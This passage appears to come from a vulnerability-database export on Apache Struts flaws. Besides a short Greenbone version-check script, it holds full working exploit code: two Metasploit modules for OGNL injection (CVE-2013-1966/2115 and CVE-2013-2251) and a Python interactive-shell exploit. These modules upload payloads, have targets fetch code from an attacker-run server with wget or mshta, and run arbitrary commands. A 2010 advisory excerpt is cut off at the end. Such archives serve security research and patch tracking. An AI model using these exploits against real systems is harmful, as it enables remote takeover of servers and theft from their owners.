characters\n in a url-encoded parameter or a denial of service (block access to a web site)\n via unspecified vectors.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x through 2.3.24.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.28 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-030.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-028.html\");\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-034.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\n## Vulnerable version according to Advisory\nif(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24.1\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.28\");\n security_message(data:report, port:appPort);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}
], "packetstorm": [{"lastseen": "2016-12-05T22:20:28", "description": "", "cvss3": {}, "published": "2013-06-02T00:00:00", "type": "packetstorm", "title": "Apache Struts includeParams Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-06-02T00:00:00", "id": "PACKETSTORM:121847", "href": "https://packetstormsecurity.com/files/121847/Apache-Struts-includeParams-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts includeParams Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.14.2. 
A specifically crafted request parameter can be used to inject \narbitrary OGNL code into the stack bypassing Struts and OGNL library protections. \nWhen targeting an action which requires interaction through GET the payload should \nbe split taking into account the URI limits. In this case, if the rendered JSP has \nmore than one point of injection, it could result in payload corruption. It should \nhappen only when the payload is larger than the URI length. \n}, \n'Author' => \n[ \n# This vulnerability was also discovered by unknown members of: \n# 'Coverity security Research Laboratory' \n# 'NSFOCUS Security Team' \n'Eric Kobrin', # Vulnerability Discovery \n'Douglas Rodrigues', # Vulnerability Discovery \n'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-2115'], \n[ 'CVE', '2013-1966'], \n[ 'OSVDB', '93645'], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'], \n[ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html'] \n], \n'Platform' => [ 'win', 'linux', 'java'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n}, \n] \n], \n'DisclosureDate' => 'May 24 2013', \n'DefaultTarget' => 2)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), \nOptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', \"/struts2-blank/example/HelloWorld.action\"]), \nOptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]), \nOptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep during the check', 5]) 
\n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \ninject_string = @inject.gsub(/CMD/,cmd) \nuri = normalize_uri(target_uri.path) \nreq_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] } \ncase datastore['HTTPMETHOD'] \nwhen 'POST' \nreq_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }}) \nwhen 'GET' \nreq_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }}) \nend \n \n# Display a nice \"progress bar\" instead of message spam \ncase @notify_flag \nwhen 0 \nprint_status(\"Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload\") \n@notify_flag = 1 \nwhen 1 \nprint(\".\") # Progress dots \nwhen 2 \nprint_status(\"Payload upload complete\") \nend \n \nreturn send_request_cgi(req_hash) #Used for check function. \nend \n \ndef exploit \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \n@java_upload_part_cmd = \"#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()\" \n#Set up generic values. \n@payload_exe = rand_text_alphanumeric(4+rand(4)) \npl_exe = generate_payload_exe \nappend = false \n#Now arch specific... 
\ncase target['Platform'] \nwhen 'linux' \n@payload_exe = \"/tmp/#{@payload_exe}\" \nchmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\" \nwhen 'java' \n@payload_exe << \".jar\" \npl_exe = payload.encoded_jar.pack \nexec_cmd = \"\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,true),\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,false),\" \nexec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\" \nexec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \nexec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \nexec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nwhen 'windows' \n@payload_exe = \"./#{@payload_exe}.exe\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\" \nelse \nfail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') \nend \n \nprint_status(\"Preparing payload...\") \n# Now with all the arch specific stuff set, perform the upload. \n# Need to calculate amount to allocate for non-dynamic parts of the URL. \n# Fixed strings are tokens used for substitutions. \nappend_length = append ? 
\"true\".length : \"false\".length # Gets around the boolean/string issue \nsub_from_chunk = append_length + ( @java_upload_part_cmd.length - \"FILENAME\".length - \"APPEND\".length - \"BUFFER\".length ) \nsub_from_chunk += ( @inject.length - \"CMD\".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length \ncase datastore['HTTPMETHOD'] \nwhen 'GET' \nchunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the \"static\" URL items. \n#This lets us know the length remaining for our base64'd payloads \nchunk_length = ((chunk_length/4).floor)*3 \nwhen 'POST' \nchunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore. \nend \n@notify_flag = 0 \nwhile pl_exe.length > chunk_length \njava_upload_part(pl_exe[0,chunk_length],@payload_exe,append) \npl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] \nappend = true \nend \njava_upload_part(pl_exe,@payload_exe,append) \nexecute_command(chmod_cmd) if target['Platform'] == 'linux' \nprint_line() # new line character, after progress bar. \n@notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file. \nexecute_command(exec_cmd) \nregister_files_for_cleanup(@payload_exe) \nend \n \ndef java_upload_part(part, filename, append = false) \ncmd = @java_upload_part_cmd.gsub(/FILENAME/,filename) \nappend = append ? \"true\" : \"false\" # converted for the string replacement. 
\ncmd = cmd.gsub!(/APPEND/,append) \ncmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part)) \nexecute_command(cmd) \nend \n \ndef check \n#initialise some base vars \n@inject = \"${#_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,CMD}\" \nprint_status(\"Performing Check...\") \nsleep_time = datastore['CHECK_SLEEPTIME'] \ncheck_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\" \nt1 = Time.now \nprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\") \nresponse = execute_command(check_cmd) \nt2 = Time.now \ndelta = t2 - t1 \n \n \nif response.nil? \nreturn Exploit::CheckCode::Safe \nelsif delta < sleep_time \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/121847/struts_include_params.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:13:37", "description": "", "cvss3": {}, "published": "2013-07-25T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-25T00:00:00", "id": "PACKETSTORM:122541", "href": "https://packetstormsecurity.com/files/122541/Apache-Struts-2-DefaultActionMapper-Prefixes-OGNL-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution', \n'Description' => %q{ \nThe Struts 2 DefaultActionMapper supports a method for short-circuit navigation \nstate changes by prefixing parameters with \"action:\" or \"redirect:\", followed by \na desired navigational target expression. This mechanism was intended to help with \nattaching navigational information to buttons within forms. \n \nIn Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \n\"redirectAction:\" is not properly sanitized. Since said information will be \nevaluated as OGNL expression against the value stack, this introduces the \npossibility to inject server side code. \n \nThis module has been tested successfully on Struts 2.3.15 over Tomcat 7, with \nWindows 2003 SP2 and Ubuntu 10.04 operating systems. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Takeshi Terada', # Vulnerability discovery \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit modules \n], \n'References' => \n[ \n[ 'CVE', '2013-2251' ], \n[ 'OSVDB', '95405' ], \n[ 'BID', '61189' ], \n[ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ] \n], \n'Platform' => [ 'win', 'linux'], \n'Targets' => \n[ \n['Automatic', {}], \n['Windows', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n] \n], \n'DefaultOptions' => \n{ \n'WfsDelay' => 10 \n}, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DisclosureDate' => 'Jul 2 2013', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']), \nOptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]), \n# It isn't OptPath becuase it's a *remote* path \nOptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ]) \n], self.class) \nend \n \ndef on_new_session(session) \nif session.type == \"meterpreter\" \nsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\") \nend \n \n@dropped_files.delete_if do |file| \nfalse unless file =~ /\\.exe/ \nwin_file = file.gsub(\"/\", \"\\\\\\\\\") \nif session.type == \"meterpreter\" \nbegin \nwintemp = session.fs.file.expand_path(\"%TEMP%\") \nwin_file = \"#{wintemp}\\\\#{win_file}\" \nsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|) \nsession.fs.file.rm(win_file) \nprint_good(\"Deleted #{file}\") \ntrue \nrescue ::Rex::Post::Meterpreter::RequestError \nprint_error(\"Failed to delete #{win_file}\") \nfalse \nend \nend \nend \n \nsuper \nend \n \ndef start_http_service \n#do not use SSL \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \nif (datastore['SRVHOST'] 
== \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \nservice_url = srv_host + ':' + datastore['SRVPORT'].to_s \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\") \nstart_service({ \n'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => '/' \n} \n}) \n \ndatastore['SSL'] = true if ssl_restore \n \nreturn service_url \nend \n \ndef check \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? or res.code != 200 \nprint_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\") \nreturn Exploit::CheckCode::Unknown \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef auto_target \nuri = normalize_uri(target_uri.path) \nres = send_request_cgi({ \n'uri' => uri, \n'method' => 'GET' \n}) \n \nif res.nil? 
or res.code != 200 \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\") \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nif res.headers['Location'] =~ /:\\\\/ \nreturn targets[1] # Windows \nelse \nreturn targets[2] # Linux \nend \nend \n \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\") \n \nend \n \ndef exploit_linux \n \ndownfile = rand_text_alpha(8+rand(8)) \n@pl = @exe \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# download payload \n# \nfname = datastore['WritableDir'] \nfname = \"#{fname}/\" unless fname =~ %r'/$' \nfname << downfile \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? 
or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(fname) \n \n# \n# chmod \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Make payload executable...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# execute \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \nend \n \ndef exploit_windows \n@var_exename = rand_text_alpha(4 + rand(4)) + '.exe' \n@pl = build_hta \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# execute hta \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? 
or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(@var_exename) \nend \n \ndef exploit \nif target.name =~ /Automatic/ \nprint_status(\"#{rhost}:#{rport} - Target autodetection...\") \nmy_target = auto_target \nprint_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\") \nelse \nmy_target = target \nend \n \np = exploit_regenerate_payload(my_target.platform, my_target.arch) \n@exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch}) \n \nif my_target.name =~ /Linux/ \nif datastore['PAYLOAD'] =~ /windows/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\") \nend \nexploit_linux \nelsif my_target.name =~ /Windows/ \nif datastore['PAYLOAD'] =~ /linux/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\") \nend \nexploit_windows \nend \nend \n \n# Handle incoming requests from the server \ndef on_request_uri(cli, request) \nvprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\") \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend \nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@pl_sent = true \nsend_response(cli, @pl) \nend \n \n# wait for the data to be sent \ndef wait_payload \nprint_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\") \n \nwaited = 0 \nwhile (not @pl_sent) \nselect(nil, nil, nil, 1) \nwaited += 1 \nif (waited > datastore['HTTP_DELAY']) \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\") \nend \nend \nend \n \ndef build_hta \nvar_shellobj = rand_text_alpha(rand(5)+5); 
\nvar_fsobj = rand_text_alpha(rand(5)+5); \nvar_fsobj_file = rand_text_alpha(rand(5)+5); \nvar_vbsname = rand_text_alpha(rand(5)+5); \nvar_writedir = rand_text_alpha(rand(5)+5); \n \nvar_origLoc = rand_text_alpha(rand(5)+5); \nvar_byteArray = rand_text_alpha(rand(5)+5); \nvar_writestream = rand_text_alpha(rand(5)+5); \nvar_strmConv = rand_text_alpha(rand(5)+5); \n \n# Doing in this way to bypass the ADODB.Stream restrictions on JS, \n# even when executing it as an \"HTA\" application \n# The encoding code has been stolen from ie_unsafe_scripting.rb \nprint_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\"); \n \n# Build the content that will end up in the .vbs file \nvbs_content = Rex::Text.to_hex(%Q| \nDim #{var_origLoc}, s, #{var_byteArray} \n#{var_origLoc} = SetLocale(1033) \n|) \n# Drop the exe payload into an ansi string (ansi ensured via SetLocale above) \n# for conversion with ADODB.Stream \nvbs_ary = [] \n# The output of this loop needs to be as small as possible since it \n# gets repeated for every byte of the executable, ballooning it by a \n# factor of about 80k (the current size of the exe template). In its \n# current form, it's down to about 4MB on the wire \n@exe.each_byte do |b| \nvbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\") \nend \nvbs_content << vbs_ary.join(\"\") \n \n# Continue with the rest of the vbs file; \n# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent \n# Then use ADODB.Stream again to write the binary to file. 
\n#print_status(\"Finishing vbs...\"); \nvbs_content << Rex::Text.to_hex(%Q| \nDim #{var_strmConv}, #{var_writedir}, #{var_writestream} \n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\" \n \nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\") \n \n#{var_strmConv}.Type = 2 \n#{var_strmConv}.Charset = \"x-ansi\" \n#{var_strmConv}.Open \n#{var_strmConv}.WriteText s, 0 \n#{var_strmConv}.Position = 0 \n#{var_strmConv}.Type = 1 \n#{var_strmConv}.SaveToFile #{var_writedir}, 2 \n \nSetLocale(#{var_origLoc})|) \n \nhta = <<-EOS \n<script> \nvar #{var_shellobj} = new ActiveXObject(\"WScript.Shell\"); \nvar #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\"); \nvar #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\"); \nvar #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true); \n \n#{var_fsobj_file}.Write(unescape(\"#{vbs_content}\")); \n#{var_fsobj_file}.Close(); \n \n#{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true); \n#{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false); \n#{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\"); \nwindow.close(); \n</script> \nEOS \n \nreturn hta \nend \n \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122541/struts_default_action_mapper.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-20T20:45:40", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159629", "href": 
"https://packetstormsecurity.com/files/159629/Apache-Struts-2-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution\n# Google Dork: ext:action | filetype:action\n# Date: 2020/09/09\n# Exploit Author: Jonatas Fil\n# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html\n# Version: <= 2.3.15\n# Tested on: Linux\n# CVE : CVE-2013-2251\n\n#!/usr/bin/python\n#\n# coding=utf-8\n#\n# Struts 2 DefaultActionMapper Exploit [S2-016]\n# Interactive Shell for CVE-2013-2251\n#\n# The Struts 2 DefaultActionMapper supports a method for short-circuit\n# navigation state changes by prefixing parameters with\n# \"action:\" or \"redirect:\", followed by a desired navigational target\n# expression. This mechanism was intended to help with\n# attaching navigational information to buttons within forms.\n#\n# https://struts.apache.org/docs/s2-016.html\n# Jonatas Fil (@exploitation)\n\nimport requests\nimport sys\nimport readline  # imported for its side effect: line editing and history at the prompt\n\n\n# Disable SSL certificate warnings (verify=False below)\nrequests.packages.urllib3.disable_warnings()\n\n# ShellEvil\nif len(sys.argv) == 2:\n    target = sys.argv[1]\n    # Payload: the value of the redirect: parameter is evaluated as OGNL. The command\n    # typed at the prompt is spliced between these two halves; its stdout is read into\n    # a char buffer and written straight into the HTTP response.\n    first = target + \"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','\"\n    second = \"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}\"\n    loop = 1\n    while loop == 1:\n        cmd = input(\"$ \")\n        while cmd.strip() == '':\n            cmd = input(\"$ \")\n        if cmd.strip() == '\\\\q':\n            print(\"Exiting...\")\n            sys.exit()\n        try:\n            headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36\"}\n            pwn = requests.get(first + cmd + second, headers=headers, verify=False)  # Disable SSL verification\n            if pwn.status_code == 200:\n                print(pwn.text)  # command output as returned in the response body\n            else:\n                print(\"Not Vuln !\")\n                sys.exit()\n        except Exception as e:\n            print(e)\n            print(\"Exiting...\")\n            sys.exit()\n\nelse:  # BANNER\n    print(r'''\n__ _ _ _ __ _ _\n/ _\\ |__ ___| | | /__\\_ _(_) |\n\\ \\| '_ \\ / _ \\ | |/_\\ \\ \\ / / | |\n_\\ \\ | | | __/ | //__ \\ V /| | |\n\\__/_| |_|\\___|_|_\\__/ \\_/ |_|_|\n\nby Jonatas Fil [@explotation]\n''')\n    print(\"======================================================\")\n    print(\"# Struts 2 DefaultActionMapper Exploit [S2-016] #\")\n    print(\"# USAGE: python struts.py http://site.com:8080/xxx.action #\")\n    print(\"======================================================\")\n    print(\"bye\")\n    sys.exit()\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159629/apachestrust2dam-exec.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-12-05T22:21:06", "description": "", "cvss3": {}, "published": "2010-07-14T00:00:00", "type": "packetstorm", "title": "Struts2/XWork Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2010-07-14T00:00:00", "id": "PACKETSTORM:91774", "href": "https://packetstormsecurity.com/files/91774/Struts2-XWork-Remote-Command-Execution.html", "sourceData": "`Friday, July 9, 2010 \nCVE-2010-1870: Struts2/XWork remote command execution \nUpdate Tue Jul 13 2010: Added proof of concept \n \nApache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed. \n \nIntroduction \nStruts2 is Struts + WebWork. 
WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns: \n \nuser.address.city=Bishkek&user['favoriteDrink']=kumys \n \ninto \n \naction.getUser().getAddress().setCity(\"Bishkek\") \naction.getUser().setFavoriteDrink(\"kumys\") \n \nThis is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments. \nNOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml). \n \nIn addition to property getting/setting, OGNL supports many more features: \n \n* Method calling: foo() \n* Static method calling: @java.lang.System@exit(1) \n* Constructor calling: new MyClass() \n* Ability to work with context variables: #foo = new MyClass() \n* And more... \n \nSince HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution: \n \n* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default) \n* SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default) \n \nOGNL Context variables \nTo make it easier for developer to access various frequently needed objects XWork provides several predefined context variables: \n \n* #application \n* #session \n* #request \n* #parameters \n* #attr \n \nThese variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \\u0023. 
